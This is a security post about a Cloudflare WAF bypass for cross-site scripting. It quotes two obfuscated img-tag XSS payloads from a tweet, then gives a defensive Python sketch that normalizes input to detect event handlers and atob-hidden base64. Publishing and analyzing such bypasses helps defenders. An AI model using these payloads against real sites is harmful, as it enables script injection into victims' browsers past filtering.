A Cloudflare WAF bypass for XSS has been discovered. It combines simple (but efficient) tricks with obfuscation and filter evasion. The example payloads are image tags whose attributes trigger script execution. Such a payload runs in the victim's browser when the WAF's filters fail to detect it. Security teams should be aware of this bypass and strengthen their defenses to mitigate such attacks. #Cloudflare #WAF #Bypass #XSS
A Cloudflare WAF bypass combining simple (but efficient) tricks
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>
A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
#CF #WAF #Bypass #Payload
— Yetixx (@CyberYetixx) August 21, 2024
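For defenders, the sketch below is an added example (not from the original post, and not Cloudflare's rule logic) showing why literal signatures miss the two payloads above and what normalization recovers: percent-decoding, case folding, treating "/" as an attribute separator, and decoding base64 passed to atob(). The function names, the naive rule and the benign sample are assumptions made for illustration.

```python
import base64
import re
from urllib.parse import unquote

# The two payloads quoted on this page, plus one constructed benign tag.
PAGE_SAMPLES = [
    '<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>',
    "<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>",
]
BENIGN = '<img src="/logo.png" alt="click / onload = fast">'

TAG = re.compile(r"<[a-z][^>]*>", re.I)
QUOTED = re.compile(r"\"[^\"]*\"|'[^']*'")
# HTML accepts "/" as well as whitespace between attributes.
HANDLER = re.compile(r"[\s/](on[a-z]+)\s*=", re.I)
# atob() argument given as a string, template or regex literal.
ATOB = re.compile(r"atob\(\s*([/'\"`])(.+?)\1")

def naive_signature(raw):  # hypothetical literal rule, for contrast only
    return " onerror=" in raw

def url_decode(text, rounds=3):  # undo percent-encoding, incl. double encoding
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def inspect(raw):
    """Return on* attribute names and base64 hidden behind atob()."""
    text = url_decode(raw)
    handlers = []
    for tag in TAG.findall(text):
        bare = QUOTED.sub('""', tag)  # ignore text inside quoted values
        handlers += [name.lower() for name in HANDLER.findall(bare)]
    decoded = []
    for match in ATOB.finditer(text):
        blob = match.group(2).replace("\\", "")
        padded = blob + "=" * (-len(blob) % 4)
        try:
            decoded.append(base64.b64decode(padded, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass  # not base64 after all
    return {"handlers": handlers, "decoded": decoded}

if __name__ == "__main__":
    for sample in PAGE_SAMPLES + [BENIGN]:
        print(naive_signature(sample), inspect(sample))
```

The detector reports every on* attribute name rather than matching a fixed list, so the first sample yields both "only" and "onerror"; the regex-based tag matching is a simplification and does not replace context-aware output encoding in the application.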